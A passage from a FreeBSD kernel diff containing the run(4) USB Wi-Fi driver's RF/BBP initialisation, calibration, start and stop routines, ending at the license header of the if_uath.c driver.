rt3572_def_rf[i].val); } } else { for (i = 0; i < nitems(rt3070_def_rf); i++) { run_rt3070_rf_write(sc, rt3070_def_rf[i].reg, rt3070_def_rf[i].val); } } if (sc->mac_ver == 0x3070 && sc->mac_rev < 0x0201) { /* * Change voltage from 1.2V to 1.35V for RT3070. * The DAC issue (RT3070_LDO_CFG0) has been fixed * in RT3070(F). */ run_read(sc, RT3070_LDO_CFG0, &tmp); tmp = (tmp & ~0x0f000000) | 0x0d000000; run_write(sc, RT3070_LDO_CFG0, tmp); } else if (sc->mac_ver == 0x3071) { run_rt3070_rf_read(sc, 6, &rf); run_rt3070_rf_write(sc, 6, rf | 0x40); run_rt3070_rf_write(sc, 31, 0x14); run_read(sc, RT3070_LDO_CFG0, &tmp); tmp &= ~0x1f000000; if (sc->mac_rev < 0x0211) tmp |= 0x0d000000; /* 1.3V */ else tmp |= 0x01000000; /* 1.2V */ run_write(sc, RT3070_LDO_CFG0, tmp); /* patch LNA_PE_G1 */ run_read(sc, RT3070_GPIO_SWITCH, &tmp); run_write(sc, RT3070_GPIO_SWITCH, tmp & ~0x20); } else if (sc->mac_ver == 0x3572) { run_rt3070_rf_read(sc, 6, &rf); run_rt3070_rf_write(sc, 6, rf | 0x40); /* increase voltage from 1.2V to 1.35V */ run_read(sc, RT3070_LDO_CFG0, &tmp); tmp = (tmp & ~0x1f000000) | 0x0d000000; run_write(sc, RT3070_LDO_CFG0, tmp); if (sc->mac_rev < 0x0211 || !sc->patch_dac) { run_delay(sc, 1); /* wait for 1msec */ /* decrease voltage back to 1.2V */ tmp = (tmp & ~0x1f000000) | 0x01000000; run_write(sc, RT3070_LDO_CFG0, tmp); } } /* select 20MHz bandwidth */ run_rt3070_rf_read(sc, 31, &rf); run_rt3070_rf_write(sc, 31, rf & ~0x20); /* calibrate filter for 20MHz bandwidth */ sc->rf24_20mhz = 0x1f; /* default value */ target = (sc->mac_ver < 0x3071) ? 0x16 : 0x13; run_rt3070_filter_calib(sc, 0x07, target, &sc->rf24_20mhz); /* select 40MHz bandwidth */ run_bbp_read(sc, 4, &bbp4); run_bbp_write(sc, 4, (bbp4 & ~0x18) | 0x10); run_rt3070_rf_read(sc, 31, &rf); run_rt3070_rf_write(sc, 31, rf | 0x20); /* calibrate filter for 40MHz bandwidth */ sc->rf24_40mhz = 0x2f; /* default value */ target = (sc->mac_ver < 0x3071) ? 0x19 : 0x15; run_rt3070_filter_calib(sc, 0x27, target, &sc->rf24_40mhz); /* go back to 20MHz bandwidth */ run_bbp_read(sc, 4, &bbp4); run_bbp_write(sc, 4, bbp4 & ~0x18); if (sc->mac_ver == 0x3572) { /* save default BBP registers 25 and 26 values */ run_bbp_read(sc, 25, &sc->bbp25); run_bbp_read(sc, 26, &sc->bbp26); } else if (sc->mac_rev < 0x0201 || sc->mac_rev < 0x0211) run_rt3070_rf_write(sc, 27, 0x03); run_read(sc, RT3070_OPT_14, &tmp); run_write(sc, RT3070_OPT_14, tmp | 1); if (sc->mac_ver == 0x3070 || sc->mac_ver == 0x3071) { run_rt3070_rf_read(sc, 17, &rf); rf &= ~RT3070_TX_LO1; if ((sc->mac_ver == 0x3070 || (sc->mac_ver == 0x3071 && sc->mac_rev >= 0x0211)) && !sc->ext_2ghz_lna) rf |= 0x20; /* fix for long range Rx issue */ mingain = (sc->mac_ver == 0x3070) ? 1 : 2; if (sc->txmixgain_2ghz >= mingain) rf = (rf & ~0x7) | sc->txmixgain_2ghz; run_rt3070_rf_write(sc, 17, rf); } if (sc->mac_rev == 0x3071) { run_rt3070_rf_read(sc, 1, &rf); rf &= ~(RT3070_RX0_PD | RT3070_TX0_PD); rf |= RT3070_RF_BLOCK | RT3070_RX1_PD | RT3070_TX1_PD; run_rt3070_rf_write(sc, 1, rf); run_rt3070_rf_read(sc, 15, &rf); run_rt3070_rf_write(sc, 15, rf & ~RT3070_TX_LO2); run_rt3070_rf_read(sc, 20, &rf); run_rt3070_rf_write(sc, 20, rf & ~RT3070_RX_LO1); run_rt3070_rf_read(sc, 21, &rf); run_rt3070_rf_write(sc, 21, rf & ~RT3070_RX_LO2); } if (sc->mac_ver == 0x3070 || sc->mac_ver == 0x3071) { /* fix Tx to Rx IQ glitch by raising RF voltage */ run_rt3070_rf_read(sc, 27, &rf); rf &= ~0x77; if (sc->mac_rev < 0x0211) rf |= 0x03; run_rt3070_rf_write(sc, 27, rf); } return (0); } static void run_rt3593_rf_init(struct run_softc *sc) { uint32_t tmp; uint8_t rf; int i; /* Disable the GPIO bits 4 and 7 for LNA PE control. */ run_read(sc, RT3070_GPIO_SWITCH, &tmp); tmp &= ~(1 << 4 | 1 << 7); run_write(sc, RT3070_GPIO_SWITCH, tmp); /* Initialize RF registers to default value. */ for (i = 0; i < nitems(rt3593_def_rf); i++) { run_rt3070_rf_write(sc, rt3593_def_rf[i].reg, rt3593_def_rf[i].val); } /* Toggle RF R2 to initiate calibration. */ run_rt3070_rf_write(sc, 2, RT5390_RESCAL); /* Initialize RF frequency offset. */ run_adjust_freq_offset(sc); run_rt3070_rf_read(sc, 18, &rf); run_rt3070_rf_write(sc, 18, rf | RT3593_AUTOTUNE_BYPASS); /* * Increase voltage from 1.2V to 1.35V, wait for 1 msec to * decrease voltage back to 1.2V. */ run_read(sc, RT3070_LDO_CFG0, &tmp); tmp = (tmp & ~0x1f000000) | 0x0d000000; run_write(sc, RT3070_LDO_CFG0, tmp); run_delay(sc, 1); tmp = (tmp & ~0x1f000000) | 0x01000000; run_write(sc, RT3070_LDO_CFG0, tmp); sc->rf24_20mhz = 0x1f; sc->rf24_40mhz = 0x2f; /* Save default BBP registers 25 and 26 values. */ run_bbp_read(sc, 25, &sc->bbp25); run_bbp_read(sc, 26, &sc->bbp26); run_read(sc, RT3070_OPT_14, &tmp); run_write(sc, RT3070_OPT_14, tmp | 1); } static void run_rt5390_rf_init(struct run_softc *sc) { uint32_t tmp; uint8_t rf; int i; /* Toggle RF R2 to initiate calibration. */ if (sc->mac_ver == 0x5390) { run_rt3070_rf_read(sc, 2, &rf); run_rt3070_rf_write(sc, 2, rf | RT5390_RESCAL); run_delay(sc, 10); run_rt3070_rf_write(sc, 2, rf & ~RT5390_RESCAL); } else { run_rt3070_rf_write(sc, 2, RT5390_RESCAL); run_delay(sc, 10); } /* Initialize RF registers to default value. */ if (sc->mac_ver == 0x5592) { for (i = 0; i < nitems(rt5592_def_rf); i++) { run_rt3070_rf_write(sc, rt5592_def_rf[i].reg, rt5592_def_rf[i].val); } /* Initialize RF frequency offset. */ run_adjust_freq_offset(sc); } else if (sc->mac_ver == 0x5392) { for (i = 0; i < nitems(rt5392_def_rf); i++) { run_rt3070_rf_write(sc, rt5392_def_rf[i].reg, rt5392_def_rf[i].val); } if (sc->mac_rev >= 0x0223) { run_rt3070_rf_write(sc, 23, 0x0f); run_rt3070_rf_write(sc, 24, 0x3e); run_rt3070_rf_write(sc, 51, 0x32); run_rt3070_rf_write(sc, 53, 0x22); run_rt3070_rf_write(sc, 56, 0xc1); run_rt3070_rf_write(sc, 59, 0x0f); } } else { for (i = 0; i < nitems(rt5390_def_rf); i++) { run_rt3070_rf_write(sc, rt5390_def_rf[i].reg, rt5390_def_rf[i].val); } if (sc->mac_rev >= 0x0502) { run_rt3070_rf_write(sc, 6, 0xe0); run_rt3070_rf_write(sc, 25, 0x80); run_rt3070_rf_write(sc, 46, 0x73); run_rt3070_rf_write(sc, 53, 0x00); run_rt3070_rf_write(sc, 56, 0x42); run_rt3070_rf_write(sc, 61, 0xd1); } } sc->rf24_20mhz = 0x1f; /* default value */ sc->rf24_40mhz = (sc->mac_ver == 0x5592) ? 0 : 0x2f; if (sc->mac_rev < 0x0211) run_rt3070_rf_write(sc, 27, 0x3); run_read(sc, RT3070_OPT_14, &tmp); run_write(sc, RT3070_OPT_14, tmp | 1); } static int run_rt3070_filter_calib(struct run_softc *sc, uint8_t init, uint8_t target, uint8_t *val) { uint8_t rf22, rf24; uint8_t bbp55_pb, bbp55_sb, delta; int ntries; /* program filter */ run_rt3070_rf_read(sc, 24, &rf24); rf24 = (rf24 & 0xc0) | init; /* initial filter value */ run_rt3070_rf_write(sc, 24, rf24); /* enable baseband loopback mode */ run_rt3070_rf_read(sc, 22, &rf22); run_rt3070_rf_write(sc, 22, rf22 | 0x01); /* set power and frequency of passband test tone */ run_bbp_write(sc, 24, 0x00); for (ntries = 0; ntries < 100; ntries++) { /* transmit test tone */ run_bbp_write(sc, 25, 0x90); run_delay(sc, 10); /* read received power */ run_bbp_read(sc, 55, &bbp55_pb); if (bbp55_pb != 0) break; } if (ntries == 100) return (ETIMEDOUT); /* set power and frequency of stopband test tone */ run_bbp_write(sc, 24, 0x06); for (ntries = 0; ntries < 100; ntries++) { /* transmit test tone */ run_bbp_write(sc, 25, 0x90); run_delay(sc, 10); /* read received power */ run_bbp_read(sc, 55, &bbp55_sb); delta = bbp55_pb - bbp55_sb; if (delta > target) break; /* reprogram filter */ rf24++; run_rt3070_rf_write(sc, 24, rf24); } if (ntries < 100) { if (rf24 != init) rf24--; /* backtrack */ *val = rf24; run_rt3070_rf_write(sc, 24, rf24); } /* restore initial state */ run_bbp_write(sc, 24, 0x00); /* disable baseband loopback mode */ run_rt3070_rf_read(sc, 22, &rf22); run_rt3070_rf_write(sc, 22, rf22 & ~0x01); return (0); } static void run_rt3070_rf_setup(struct run_softc *sc) { uint8_t bbp, rf; int i; if (sc->mac_ver == 0x3572) { /* enable DC filter */ if (sc->mac_rev >= 0x0201) run_bbp_write(sc, 103, 0xc0); run_bbp_read(sc, 138, &bbp); if (sc->ntxchains == 1) bbp |= 0x20; /* turn off DAC1 */ if (sc->nrxchains == 1) bbp &= ~0x02; /* turn off ADC1 */ run_bbp_write(sc, 138, bbp); if (sc->mac_rev >= 0x0211) { /* improve power consumption */ run_bbp_read(sc, 31, &bbp); run_bbp_write(sc, 31, bbp & ~0x03); } run_rt3070_rf_read(sc, 16, &rf); rf = (rf & ~0x07) | sc->txmixgain_2ghz; run_rt3070_rf_write(sc, 16, rf); } else if (sc->mac_ver == 0x3071) { if (sc->mac_rev >= 0x0211) { /* enable DC filter */ run_bbp_write(sc, 103, 0xc0); /* improve power consumption */ run_bbp_read(sc, 31, &bbp); run_bbp_write(sc, 31, bbp & ~0x03); } run_bbp_read(sc, 138, &bbp); if (sc->ntxchains == 1) bbp |= 0x20; /* turn off DAC1 */ if (sc->nrxchains == 1) bbp &= ~0x02; /* turn off ADC1 */ run_bbp_write(sc, 138, bbp); run_write(sc, RT2860_TX_SW_CFG1, 0); if (sc->mac_rev < 0x0211) { run_write(sc, RT2860_TX_SW_CFG2, sc->patch_dac ? 0x2c : 0x0f); } else run_write(sc, RT2860_TX_SW_CFG2, 0); } else if (sc->mac_ver == 0x3070) { if (sc->mac_rev >= 0x0201) { /* enable DC filter */ run_bbp_write(sc, 103, 0xc0); /* improve power consumption */ run_bbp_read(sc, 31, &bbp); run_bbp_write(sc, 31, bbp & ~0x03); } if (sc->mac_rev < 0x0201) { run_write(sc, RT2860_TX_SW_CFG1, 0); run_write(sc, RT2860_TX_SW_CFG2, 0x2c); } else run_write(sc, RT2860_TX_SW_CFG2, 0); } /* initialize RF registers from ROM for >=RT3071*/ if (sc->mac_ver >= 0x3071) { for (i = 0; i < 10; i++) { if (sc->rf[i].reg == 0 || sc->rf[i].reg == 0xff) continue; run_rt3070_rf_write(sc, sc->rf[i].reg, sc->rf[i].val); } } } static void run_rt3593_rf_setup(struct run_softc *sc) { uint8_t bbp, rf; if (sc->mac_rev >= 0x0211) { /* Enable DC filter. */ run_bbp_write(sc, 103, 0xc0); } run_write(sc, RT2860_TX_SW_CFG1, 0); if (sc->mac_rev < 0x0211) { run_write(sc, RT2860_TX_SW_CFG2, sc->patch_dac ? 0x2c : 0x0f); } else run_write(sc, RT2860_TX_SW_CFG2, 0); run_rt3070_rf_read(sc, 50, &rf); run_rt3070_rf_write(sc, 50, rf & ~RT3593_TX_LO2); run_rt3070_rf_read(sc, 51, &rf); rf = (rf & ~(RT3593_TX_LO1 | 0x0c)) | ((sc->txmixgain_2ghz & 0x07) << 2); run_rt3070_rf_write(sc, 51, rf); run_rt3070_rf_read(sc, 38, &rf); run_rt3070_rf_write(sc, 38, rf & ~RT5390_RX_LO1); run_rt3070_rf_read(sc, 39, &rf); run_rt3070_rf_write(sc, 39, rf & ~RT5390_RX_LO2); run_rt3070_rf_read(sc, 1, &rf); run_rt3070_rf_write(sc, 1, rf & ~(RT3070_RF_BLOCK | RT3070_PLL_PD)); run_rt3070_rf_read(sc, 30, &rf); rf = (rf & ~0x18) | 0x10; run_rt3070_rf_write(sc, 30, rf); /* Apply maximum likelihood detection for 2 stream case. */ run_bbp_read(sc, 105, &bbp); if (sc->nrxchains > 1) run_bbp_write(sc, 105, bbp | RT5390_MLD); /* Avoid data lost and CRC error. */ run_bbp_read(sc, 4, &bbp); run_bbp_write(sc, 4, bbp | RT5390_MAC_IF_CTRL); run_bbp_write(sc, 92, 0x02); run_bbp_write(sc, 82, 0x82); run_bbp_write(sc, 106, 0x05); run_bbp_write(sc, 104, 0x92); run_bbp_write(sc, 88, 0x90); run_bbp_write(sc, 148, 0xc8); run_bbp_write(sc, 47, 0x48); run_bbp_write(sc, 120, 0x50); run_bbp_write(sc, 163, 0x9d); /* SNR mapping. */ run_bbp_write(sc, 142, 0x06); run_bbp_write(sc, 143, 0xa0); run_bbp_write(sc, 142, 0x07); run_bbp_write(sc, 143, 0xa1); run_bbp_write(sc, 142, 0x08); run_bbp_write(sc, 143, 0xa2); run_bbp_write(sc, 31, 0x08); run_bbp_write(sc, 68, 0x0b); run_bbp_write(sc, 105, 0x04); } static void run_rt5390_rf_setup(struct run_softc *sc) { uint8_t bbp, rf; if (sc->mac_rev >= 0x0211) { /* Enable DC filter. */ run_bbp_write(sc, 103, 0xc0); if (sc->mac_ver != 0x5592) { /* Improve power consumption. */ run_bbp_read(sc, 31, &bbp); run_bbp_write(sc, 31, bbp & ~0x03); } } run_bbp_read(sc, 138, &bbp); if (sc->ntxchains == 1) bbp |= 0x20; /* turn off DAC1 */ if (sc->nrxchains == 1) bbp &= ~0x02; /* turn off ADC1 */ run_bbp_write(sc, 138, bbp); run_rt3070_rf_read(sc, 38, &rf); run_rt3070_rf_write(sc, 38, rf & ~RT5390_RX_LO1); run_rt3070_rf_read(sc, 39, &rf); run_rt3070_rf_write(sc, 39, rf & ~RT5390_RX_LO2); /* Avoid data lost and CRC error. */ run_bbp_read(sc, 4, &bbp); run_bbp_write(sc, 4, bbp | RT5390_MAC_IF_CTRL); run_rt3070_rf_read(sc, 30, &rf); rf = (rf & ~0x18) | 0x10; run_rt3070_rf_write(sc, 30, rf); if (sc->mac_ver != 0x5592) { run_write(sc, RT2860_TX_SW_CFG1, 0); if (sc->mac_rev < 0x0211) { run_write(sc, RT2860_TX_SW_CFG2, sc->patch_dac ? 0x2c : 0x0f); } else run_write(sc, RT2860_TX_SW_CFG2, 0); } } static int run_txrx_enable(struct run_softc *sc) { struct ieee80211com *ic = sc->sc_ifp->if_l2com; uint32_t tmp; int error, ntries; run_write(sc, RT2860_MAC_SYS_CTRL, RT2860_MAC_TX_EN); for (ntries = 0; ntries < 200; ntries++) { if ((error = run_read(sc, RT2860_WPDMA_GLO_CFG, &tmp)) != 0) return (error); if ((tmp & (RT2860_TX_DMA_BUSY | RT2860_RX_DMA_BUSY)) == 0) break; run_delay(sc, 50); } if (ntries == 200) return (ETIMEDOUT); run_delay(sc, 50); tmp |= RT2860_RX_DMA_EN | RT2860_TX_DMA_EN | RT2860_TX_WB_DDONE; run_write(sc, RT2860_WPDMA_GLO_CFG, tmp); /* enable Rx bulk aggregation (set timeout and limit) */ tmp = RT2860_USB_TX_EN | RT2860_USB_RX_EN | RT2860_USB_RX_AGG_EN | RT2860_USB_RX_AGG_TO(128) | RT2860_USB_RX_AGG_LMT(2); run_write(sc, RT2860_USB_DMA_CFG, tmp); /* set Rx filter */ tmp = RT2860_DROP_CRC_ERR | RT2860_DROP_PHY_ERR; if (ic->ic_opmode != IEEE80211_M_MONITOR) { tmp |= RT2860_DROP_UC_NOME | RT2860_DROP_DUPL | RT2860_DROP_CTS | RT2860_DROP_BA | RT2860_DROP_ACK | RT2860_DROP_VER_ERR | RT2860_DROP_CTRL_RSV | RT2860_DROP_CFACK | RT2860_DROP_CFEND; if (ic->ic_opmode == IEEE80211_M_STA) tmp |= RT2860_DROP_RTS | RT2860_DROP_PSPOLL; } run_write(sc, RT2860_RX_FILTR_CFG, tmp); run_write(sc, RT2860_MAC_SYS_CTRL, RT2860_MAC_RX_EN | RT2860_MAC_TX_EN); return (0); } static void run_adjust_freq_offset(struct run_softc *sc) { uint8_t rf, tmp; run_rt3070_rf_read(sc, 17, &rf); tmp = rf; rf = (rf & ~0x7f) | (sc->freq & 0x7f); rf = MIN(rf, 0x5f); if (tmp != rf) run_mcu_cmd(sc, 0x74, (tmp << 8 ) | rf); } static void run_init_locked(struct run_softc *sc) { struct ifnet *ifp = sc->sc_ifp; struct ieee80211com *ic = ifp->if_l2com; uint32_t tmp; uint8_t bbp1, bbp3; int i; int ridx; int ntries; if (ic->ic_nrunning > 1) return; run_stop(sc); if (run_load_microcode(sc) != 0) { device_printf(sc->sc_dev, "could not load 8051 microcode\n"); goto fail; } for (ntries = 0; ntries < 100; ntries++) { if (run_read(sc, RT2860_ASIC_VER_ID, &tmp) != 0) goto fail; if (tmp != 0 && tmp != 0xffffffff) break; run_delay(sc, 10); } if (ntries == 100) goto fail; for (i = 0; i != RUN_EP_QUEUES; i++) run_setup_tx_list(sc, &sc->sc_epq[i]); run_set_macaddr(sc, IF_LLADDR(ifp)); for (ntries = 0; ntries < 100; ntries++) { if (run_read(sc, RT2860_WPDMA_GLO_CFG, &tmp) != 0) goto fail; if ((tmp & (RT2860_TX_DMA_BUSY | RT2860_RX_DMA_BUSY)) == 0) break; run_delay(sc, 10); } if (ntries == 100) { device_printf(sc->sc_dev, "timeout waiting for DMA engine\n"); goto fail; } tmp &= 0xff0; tmp |= RT2860_TX_WB_DDONE; run_write(sc, RT2860_WPDMA_GLO_CFG, tmp); /* turn off PME_OEN to solve high-current issue */ run_read(sc, RT2860_SYS_CTRL, &tmp); run_write(sc, RT2860_SYS_CTRL, tmp & ~RT2860_PME_OEN); run_write(sc, RT2860_MAC_SYS_CTRL, RT2860_BBP_HRST | RT2860_MAC_SRST); run_write(sc, RT2860_USB_DMA_CFG, 0); if (run_reset(sc) != 0) { device_printf(sc->sc_dev, "could not reset chipset\n"); goto fail; } run_write(sc, RT2860_MAC_SYS_CTRL, 0); /* init Tx power for all Tx rates (from EEPROM) */ for (ridx = 0; ridx < 5; ridx++) { if (sc->txpow20mhz[ridx] == 0xffffffff) continue; run_write(sc, RT2860_TX_PWR_CFG(ridx), sc->txpow20mhz[ridx]); } for (i = 0; i < nitems(rt2870_def_mac); i++) run_write(sc, rt2870_def_mac[i].reg, rt2870_def_mac[i].val); run_write(sc, RT2860_WMM_AIFSN_CFG, 0x00002273); run_write(sc, RT2860_WMM_CWMIN_CFG, 0x00002344); run_write(sc, RT2860_WMM_CWMAX_CFG, 0x000034aa); if (sc->mac_ver >= 0x5390) { run_write(sc, RT2860_TX_SW_CFG0, 4 << RT2860_DLY_PAPE_EN_SHIFT | 4); if (sc->mac_ver >= 0x5392) { run_write(sc, RT2860_MAX_LEN_CFG, 0x00002fff); if (sc->mac_ver == 0x5592) { run_write(sc, RT2860_HT_FBK_CFG1, 0xedcba980); run_write(sc, RT2860_TXOP_HLDR_ET, 0x00000082); } else { run_write(sc, RT2860_HT_FBK_CFG1, 0xedcb4980); run_write(sc, RT2860_LG_FBK_CFG0, 0xedcba322); } } } else if (sc->mac_ver == 0x3593) { run_write(sc, RT2860_TX_SW_CFG0, 4 << RT2860_DLY_PAPE_EN_SHIFT | 2); } else if (sc->mac_ver >= 0x3070) { /* set delay of PA_PE assertion to 1us (unit of 0.25us) */ run_write(sc, RT2860_TX_SW_CFG0, 4 << RT2860_DLY_PAPE_EN_SHIFT); } /* wait while MAC is busy */ for (ntries = 0; ntries < 100; ntries++) { if (run_read(sc, RT2860_MAC_STATUS_REG, &tmp) != 0) goto fail; if (!(tmp & (RT2860_RX_STATUS_BUSY | RT2860_TX_STATUS_BUSY))) break; run_delay(sc, 10); } if (ntries == 100) goto fail; /* clear Host to MCU mailbox */ run_write(sc, RT2860_H2M_BBPAGENT, 0); run_write(sc, RT2860_H2M_MAILBOX, 0); run_delay(sc, 10); if (run_bbp_init(sc) != 0) { device_printf(sc->sc_dev, "could not initialize BBP\n"); goto fail; } /* abort TSF synchronization */ run_read(sc, RT2860_BCN_TIME_CFG, &tmp); tmp &= ~(RT2860_BCN_TX_EN | RT2860_TSF_TIMER_EN | RT2860_TBTT_TIMER_EN); run_write(sc, RT2860_BCN_TIME_CFG, tmp); /* clear RX WCID search table */ run_set_region_4(sc, RT2860_WCID_ENTRY(0), 0, 512); /* clear WCID attribute table */ run_set_region_4(sc, RT2860_WCID_ATTR(0), 0, 8 * 32); /* hostapd sets a key before init. So, don't clear it. */ if (sc->cmdq_key_set != RUN_CMDQ_GO) { /* clear shared key table */ run_set_region_4(sc, RT2860_SKEY(0, 0), 0, 8 * 32); /* clear shared key mode */ run_set_region_4(sc, RT2860_SKEY_MODE_0_7, 0, 4); } run_read(sc, RT2860_US_CYC_CNT, &tmp); tmp = (tmp & ~0xff) | 0x1e; run_write(sc, RT2860_US_CYC_CNT, tmp); if (sc->mac_rev != 0x0101) run_write(sc, RT2860_TXOP_CTRL_CFG, 0x0000583f); run_write(sc, RT2860_WMM_TXOP0_CFG, 0); run_write(sc, RT2860_WMM_TXOP1_CFG, 48 << 16 | 96); /* write vendor-specific BBP values (from EEPROM) */ if (sc->mac_ver < 0x3593) { for (i = 0; i < 10; i++) { if (sc->bbp[i].reg == 0 || sc->bbp[i].reg == 0xff) continue; run_bbp_write(sc, sc->bbp[i].reg, sc->bbp[i].val); } } /* select Main antenna for 1T1R devices */ if (sc->rf_rev == RT3070_RF_3020 || sc->rf_rev == RT5390_RF_5370) run_set_rx_antenna(sc, 0); /* send LEDs operating mode to microcontroller */ (void)run_mcu_cmd(sc, RT2860_MCU_CMD_LED1, sc->led[0]); (void)run_mcu_cmd(sc, RT2860_MCU_CMD_LED2, sc->led[1]); (void)run_mcu_cmd(sc, RT2860_MCU_CMD_LED3, sc->led[2]); if (sc->mac_ver >= 0x5390) run_rt5390_rf_init(sc); else if (sc->mac_ver == 0x3593) run_rt3593_rf_init(sc); else if (sc->mac_ver >= 0x3070) run_rt3070_rf_init(sc); /* disable non-existing Rx chains */ run_bbp_read(sc, 3, &bbp3); bbp3 &= ~(1 << 3 | 1 << 4); if (sc->nrxchains == 2) bbp3 |= 1 << 3; else if (sc->nrxchains == 3) bbp3 |= 1 << 4; run_bbp_write(sc, 3, bbp3); /* disable non-existing Tx chains */ run_bbp_read(sc, 1, &bbp1); if (sc->ntxchains == 1) bbp1 &= ~(1 << 3 | 1 << 4); run_bbp_write(sc, 1, bbp1); if (sc->mac_ver >= 0x5390) run_rt5390_rf_setup(sc); else if (sc->mac_ver == 0x3593) run_rt3593_rf_setup(sc); else if (sc->mac_ver >= 0x3070) run_rt3070_rf_setup(sc); /* select default channel */ run_set_chan(sc, ic->ic_curchan); /* setup initial protection mode */ run_updateprot_cb(ic); /* turn radio LED on */ run_set_leds(sc, RT2860_LED_RADIO); ifp->if_drv_flags &= ~IFF_DRV_OACTIVE; ifp->if_drv_flags |= IFF_DRV_RUNNING; sc->cmdq_run = RUN_CMDQ_GO; for (i = 0; i != RUN_N_XFER; i++) usbd_xfer_set_stall(sc->sc_xfer[i]); usbd_transfer_start(sc->sc_xfer[RUN_BULK_RX]); if (run_txrx_enable(sc) != 0) goto fail; return; fail: run_stop(sc); } static void run_init(void *arg) { struct run_softc *sc = arg; struct ifnet *ifp = sc->sc_ifp; struct ieee80211com *ic = ifp->if_l2com; RUN_LOCK(sc); run_init_locked(sc); RUN_UNLOCK(sc); if (ifp->if_drv_flags & IFF_DRV_RUNNING) ieee80211_start_all(ic); } static void run_stop(void *arg) { struct run_softc *sc = (struct run_softc *)arg; struct ifnet *ifp = sc->sc_ifp; uint32_t tmp; int i; int ntries; RUN_LOCK_ASSERT(sc, MA_OWNED); if (ifp->if_drv_flags & IFF_DRV_RUNNING) run_set_leds(sc, 0); /* turn all LEDs off */ ifp->if_drv_flags &= ~(IFF_DRV_RUNNING | IFF_DRV_OACTIVE); sc->ratectl_run = RUN_RATECTL_OFF; sc->cmdq_run = sc->cmdq_key_set; RUN_UNLOCK(sc); for(i = 0; i < RUN_N_XFER; i++) usbd_transfer_drain(sc->sc_xfer[i]); RUN_LOCK(sc); if (sc->rx_m != NULL) { m_free(sc->rx_m); sc->rx_m = NULL; } /* Disable Tx/Rx DMA. */ if (run_read(sc, RT2860_WPDMA_GLO_CFG, &tmp) != 0) return; tmp &= ~(RT2860_RX_DMA_EN | RT2860_TX_DMA_EN); run_write(sc, RT2860_WPDMA_GLO_CFG, tmp); for (ntries = 0; ntries < 100; ntries++) { if (run_read(sc, RT2860_WPDMA_GLO_CFG, &tmp) != 0) return; if ((tmp & (RT2860_TX_DMA_BUSY | RT2860_RX_DMA_BUSY)) == 0) break; run_delay(sc, 10); } if (ntries == 100) { device_printf(sc->sc_dev, "timeout waiting for DMA engine\n"); return; } /* disable Tx/Rx */ run_read(sc, RT2860_MAC_SYS_CTRL, &tmp); tmp &= ~(RT2860_MAC_RX_EN | RT2860_MAC_TX_EN); run_write(sc, RT2860_MAC_SYS_CTRL, tmp); /* wait for pending Tx to complete */ for (ntries = 0; ntries < 100; ntries++) { if (run_read(sc, RT2860_TXRXQ_PCNT, &tmp) != 0) { DPRINTF("Cannot read Tx queue count\n"); break; } if ((tmp & RT2860_TX2Q_PCNT_MASK) == 0) { DPRINTF("All Tx cleared\n"); break; } run_delay(sc, 10); } if (ntries >= 100) DPRINTF("There are still pending Tx\n"); run_delay(sc, 10); run_write(sc, RT2860_USB_DMA_CFG, 0); run_write(sc, RT2860_MAC_SYS_CTRL, RT2860_BBP_HRST | RT2860_MAC_SRST); run_write(sc, RT2860_MAC_SYS_CTRL, 0); for (i = 0; i != RUN_EP_QUEUES; i++) run_unsetup_tx_list(sc, &sc->sc_epq[i]); } static void run_delay(struct run_softc *sc, u_int ms) { usb_pause_mtx(mtx_owned(&sc->sc_mtx) ? &sc->sc_mtx : NULL, USB_MS_TO_TICKS(ms)); } static device_method_t run_methods[] = { /* Device interface */ DEVMETHOD(device_probe, run_match), DEVMETHOD(device_attach, run_attach), DEVMETHOD(device_detach, run_detach), DEVMETHOD_END }; static driver_t run_driver = { .name = "run", .methods = run_methods, .size = sizeof(struct run_softc) }; static devclass_t run_devclass; DRIVER_MODULE(run, uhub, run_driver, run_devclass, run_driver_loaded, NULL); MODULE_DEPEND(run, wlan, 1, 1, 1); MODULE_DEPEND(run, usb, 1, 1, 1); MODULE_DEPEND(run, firmware, 1, 1, 1); MODULE_VERSION(run, 1); diff --git a/sys/dev/usb/wlan/if_uath.c b/sys/dev/usb/wlan/if_uath.c index 3645d180997f..9db1e04ce3de 100644 --- a/sys/dev/usb/wlan/if_uath.c +++ b/sys/dev/usb/wlan/if_uath.c @@ -1,2909 +1,2909 @@ /*- * Copyright (c) 2006 Sam Leffler, Errno Consulting * Copyright (c) 2008-2009 Weongyo Jeong * All rights reserved. * * Redistribution and use in source and binary forms, with or without * modification, are permitted provided that the following conditions * are met: * 1. Redistributions of source code must retain the above copyright * notice, this list of conditions and the following disclaimer, * without modification. * 2. Redistributions in binary form must reproduce at minimum a disclaimer * similar to the "NO WARRANTY" disclaimer below ("Disclaimer") and any * redistribution must be conditioned upon including a substantially * similar Disclaimer requirement for further binary redistribution. * * NO WARRANTY * THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS * ``AS IS'' AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT * LIMITED TO, THE IMPLIED WARRANTIES OF NONINFRINGEMENT, MERCHANTIBILITY * AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL * THE COPYRIGHT HOLDERS OR CONTRIBUTORS BE LIABLE FOR SPECIAL, EXEMPLARY, * OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF * SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS * INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER * IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF * THE POSSIBILITY OF SUCH DAMAGES. */ /* * This driver is distantly derived from a driver of the same name * by Damien Bergamini. The original copyright is included below: * * Copyright (c) 2006 * Damien Bergamini * * Permission to use, copy, modify, and distribute this software for any * purpose with or without fee is hereby granted, provided that the above * copyright notice and this permission notice appear in all copies. * * THE SOFTWARE IS PROVIDED "AS IS" AND THE AUTHOR DISCLAIMS ALL WARRANTIES * WITH REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF * MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR * ANY SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES * WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN AN * ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING 